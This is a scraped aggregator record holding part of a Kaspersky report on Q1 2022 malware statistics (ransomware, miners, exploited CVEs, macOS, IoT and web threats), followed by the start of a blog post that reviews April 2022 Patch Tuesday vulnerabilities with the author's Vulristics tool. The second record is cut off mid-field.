discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim&#x27;s encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government&#x27;s actions on its website. The true identity of the individual who leaked the data is currently unknown. According to different versions, it could have been a researcher or an insider in the group who disagrees with its position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. More specifically, the vulnerability [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found to be exploited by an unknown group of cybercriminals: a &quot;type confusion&quot; bug in the win32k.sys driver the attacker can use to gain system privileges. Also worth noting is [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), a vulnerability in the User Profile Service which makes it possible to elevate privileges, along with [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit that targeted the [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) vulnerability in the Linux OS kernel. It was dubbed &quot;Dirty Pipe&quot;. [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) an &quot;uninitialized memory&quot; vulnerability when analyzing corrupted files, which makes it possible to rewrite a part of the OS memory, namely page memory that contains system files&#x27; data. This in turn opens up an opportunity, such as elevating attacker&#x27;s privileges to root. It&#x27;s worth noting that this vulnerability is fairly easy to exploit, which means users of all systems should regularly install security patches and use all available means to prevent infection.\n\nWhen it comes to network threats, this quarter continued to show how cybercriminals often resort to the technique of brute-forcing passwords to gain unauthorized access to various network services, the most popular of which are MSSQL, RDP and SMB. Attacks using the EternalBlue, EternalRomance and similar exploits remain as popular as ever. Due to widespread unpatched versions of Microsoft Exchange Server, networks often fall victim to exploits of ProxyToken, ProxyShell, ProxyOracle and other vulnerabilities. One example of a critical vulnerability found is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack which allows an attack to be launched remotely by sending a special network packet to a vulnerable system by means of the HTTP trailer functionality. New attacks on network applications which will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway. Specific examples of vulnerabilities in these applications are [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. For instance, the top place in the statistics is still firmly held by exploits targeting vulnerabilities in Microsoft Office and their share has increased significantly to 78.5%. The same common vulnerabilities we&#x27;ve written about on more than one occasion are still the most widely exploited within this category of threats. These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow when processing objects in a specially crafted document in the Equation Editor component and ultimately allow an attacker to execute arbitrary code. There&#x27;s also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office software gives attackers the opportunity to perform various actions on the vulnerable system. Another vulnerability found last year which is very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which they can use to exploit through a specially prepared Microsoft Office document with an embedded malicious ActiveX control for executing arbitrary code in the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly to just 7.64%. Browser developers put a great deal of effort into patching vulnerability exploits in each new version and closing a large number of gaps in system security. Apart from that, the majority of browsers have automatic updates as opposed to the distinct example of Microsoft Office, where many of its users still use outdated versions and are in no rush to install security updates. That could be precisely the reason why we&#x27;ve seen a reduction in the share of browser exploits in our statistics. However, this does not mean they&#x27;re no longer an immediate threat. For instance, Chrome&#x27;s developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a &quot;type confusion&quot; vulnerability in the V8 script engine which gives attackers the opportunity to remotely execute code (RCE) in the context of the browser&#x27;s security sandbox.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability which allows to corrupt the process memory and remotely execute arbitrary codes when performing specially generated scripts that use animation.\n\nSimilar vulnerabilities were found in the browser&#x27;s other components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>)which uses Web Store API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>) which is associated with vulnerabilities in the WebGL backend (ANGLE). Another vulnerability found was [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), which can be used to exploit a heap buffer overflow in Tab Groups, also potentially leading to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the [Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) multi-platform malware family with Windows and macOS variants that uses Google Drive to communicate with the C&amp;C server, along with the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>) with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users&#x27; browser history to its owners&#x27; servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one Malware-class local threat during Q1. Russia scored 16.88% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-27T08:00:05", "type": "securelist", "title": "IT threat evolution in Q1 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-40444", "CVE-2022-0604", "CVE-2022-0605", "CVE-2022-0606", "CVE-2022-0609", "CVE-2022-0847", "CVE-2022-1096", "CVE-2022-21836", "CVE-2022-21882", "CVE-2022-21919", "CVE-2022-22947", "CVE-2022-22965"], "modified": "2022-05-27T08:00:05", "id": "SECURELIST:11665FFD7075FB9D59316195101DE894", "href": "https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-04-23T12:23:39", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2022 and new improvements in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. I decided to add more comment sources. Because it&#x27;s not just Tenable, Qualys, Rapid7 and ZDI make Microsoft Patch Tuesday reviews, but also other security companies and bloggers. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239085>\n\nYou can see them in my automated security news telegram channel [avleonovnews](<https://t.me/avleonovnews>) after every second Tuesday of the month. So, now you can add any links with CVE comments to Vulristics.\n\nFor April Patch Tuesday I will add these sources:\n\n * [Kaspersky](<https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/>)\n * [KrebsOnSecurity](<https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/>)\n * [ComputerWeekly](<https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs>)\n * [TheHackersNews](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)\n * [Threatpost](<https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/>)\n\nLet&#x27;s see if they highlight different sets of vulnerabilities.\n \n \n $ cat comments_links.txt\n Qualys|April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday\n ZDI|THE APRIL 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review\n Kaspersky|A bunch of vulnerabilities in Windows, one already exploited|https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/\n KrebsOnSecurity|Microsoft Patch Tuesday, April 2022 Edition|https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/\n ComputerWeekly|Microsoft patches two zero-days, 10 critical bugs|https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs\n TheHackersNews|Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities|https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html\n Threatpost|Microsoft Zero-Days, Wormable Bugs Spark Concern|https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/\n\nI have also added links to [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday>) and [ZDI](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) blogposts. Qualys didn&#x27;t fix their blog search (apparently no one uses it). ZDI don&#x27;t have a blog search, and duckduckgo stopped indexing them properly. \n\nIn addition, Tenable closed access to their [tenable.com](<http://tenable.com>). This is rather ironic considering that [Russian Tenable Security Day](<https://tenable-day.tiger-optics.ru/>) took place on February 10, 2022, just two months ago. [I participated in it](<https://www.youtube.com/watch?v=V5T3ftcFwdY>). It was a formal event with [Tenable&#x27;s EMEA CTO and Regional Manager](<https://t.me/avleonovcom/961>). And now we are not talking about any support, updates and licenses for Russian companies and individuals, but even about access to the Tenable website. This is how the situation can change rapidly, if you trust Western vendors. Try not to do this.\n\nBut in any case, you can still use the Tenable blog as a source of comments about Patch Tuesday vulnerabilities. I have added socks proxy support to Vulristics.\n \n \n vulners_key = \"SFKJKEWRID2JFIJ...AAK3DHKSJD\"\n proxies = {\n 'http': \"socks5://<host>:<port>\",\n 'https': \"socks5://<host>:<port>\"\n }\n\nI run the command like this:\n \n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"April\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n\nJust like last month, I&#x27;m taking into account not only the vulnerabilities published on April 11 (117 CVEs), but also all the vulnerabilities since last Patch Tuesday (40 CVEs). There are a total of 157 CVEs in the report.\n \n \n MS PT Year: 2022\n MS PT Month: April\n MS PT Date: 2022-04-12\n MS PT CVEs found: 117\n Ext MS PT Date from: 2022-03-09\n Ext MS PT Date to: 2022-04-11\n Ext MS PT CVEs found: 40\n ALL MS PT CVEs: 157\n\n * Critical: 5\n * High: 51\n * Medium: 91\n * Low: 10\n\nLet&#x27;s start with the critical ones:\n\n * **Elevation of Privilege** - Windows Common Log File System Driver ([CVE-2022-24521](<https://vulners.com/cve/CVE-2022-24521>)). Exploitation in the wild is mentioned in AttackerKB and Microsoft. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Functional Exploit). Since this vulnerability only allows a privilege escalation, it is likely paired with a separate code execution bug. This vulnerability was reported by the US National Security Agency.\n * **Remote Code Execution** - Remote Procedure Call Runtime ([CVE-2022-26809](<https://vulners.com/cve/CVE-2022-26809>)). An unauthenticated, remote attacker could exploit this vulnerability by sending \u201ca specially crafted RPC call to an RPC host.\u201d The vulnerability could allow a remote attacker to execute code at high privileges on an affected system. Since no user interaction is required, these factors combine to make this wormable, at least between machine where RPC can be reached. A proof of concept of this vulnerability [is available on giithub](<https://github.com/XmasSnow1/cve-2022-26809>). Other RCEs in RPC ([CVE-2022-24492](<https://vulners.com/cve/CVE-2022-24492>), [CVE-2022-24528](<https://vulners.com/cve/CVE-2022-24528>)) were also classified as Critical, but this is due to misattribution of exploits. The only exploitable is [CVE-2022-26809](<https://vulners.com/githubexploit/706a6eeb-1d07-53eb-8455-f7809863dadc>). \n * ****Remote Code Execution**** - Microsoft Edge ([CVE-2022-1096](<https://vulners.com/cve/CVE-2022-1096>)). In Vulristics report it was detected as **Unknown Vulnerability Type** because it&#x27;s impossible to detect vulnerability type by description. &quot;This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware that an exploit for CVE-2022-1096 exists in the wild.&quot; In fact it is a well-known 0day RCE in Chrome, that affected all other Chromium-based browsers. Exploitation in the wild is mentioned in AttackerKB. The Vulristics report states that &quot;Public exploit is found at Vulners&quot;. However, it&#x27;s just a &quot;Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096&quot;. Yes, it is difficult to determine what exactly was uploaded on github.\n\nNow let&#x27;s see the most interesting vulnerabilities with the High level.\n\n * **Elevation of Privilege** - Windows User Profile Service ([CVE-2022-26904](<https://vulners.com/cve/CVE-2022-26904>)). This vulnerability supposed to have been fixed in the August 2021 update, when it was tracked as CVE-2021-34484. However, the researcher who discovered it later discovered a bypass, and then when that was fixed again in January, he went and bypassed it a second time. Not only is PoC out there for it, there\u2019s a [Metasploit module](<https://vulners.com/metasploit/msf:exploit/windows/local/cve_2022_26904_superprofile/>) as well. This privilege escalation vulnerability allows an attacker to gain code execution at SYSTEM level on affected systems. The vulnerability relies on winning a race condition, which can be tricky to reliably achieve.\n * **Information Disclosure** - Windows Kernel ([CVE-2022-24483](<https://vulners.com/cve/CVE-2022-24483>)). Little is known about this vulnerability and no one has highlighted this vulnerability, but there is a [PoC for it on github](<https://github.com/waleedassar/CVE-2022-24483>).\n * **Remote Code Execution** - Windows DNS Server ([CVE-2022-26812](<https://vulners.com/cve/CVE-2022-26812>), [CVE-2022-26814](<https://vulners.com/cve/CVE-2022-26814>), [CVE-2022-26829](<https://vulners.com/cve/CVE-2022-26829>)). Also, no one highlighted this vulnerability. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Proof-of-Concept Exploit). There were 18(!) DNS Server bugs receiving patches this month.\n\nFor the remaining vulnerabilities, there is neither a sign of exploitation in the wild, nor a sign of a public exploit. Let&#x27;s see the most interesting ones.\n\n * **Remote Code Execution** - Windows SMB ([CVE-2022-24500](<https://vulners.com/cve/CVE-2022-24500>)). This vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. Exploitability Assessment: Exploitation Less Likely. **Remote Code Execution** - Windows Kernel ([CVE-2022-24541](<https://vulners.com/cve/CVE-2022-24541>)) is actually a similar SMB vulnerability as well.\n * **Remote Code Execution** - Windows Network File System ([CVE-2022-24491](<https://vulners.com/cve/CVE-2022-24491>), [CVE-2022-24497](<https://vulners.com/cve/CVE-2022-24497>)). An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the NFS role enabled. Exploitability Assessment: Exploitation More Likely.\n\nAs you can see, additional sources of comments actually repeat everything that ZDI, Qualys, Rapid7 and Tenable highlight, but sometimes they add interesting details about vulnerabilities.\n\nThe full report is available: [ms_patch_tuesday_april2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 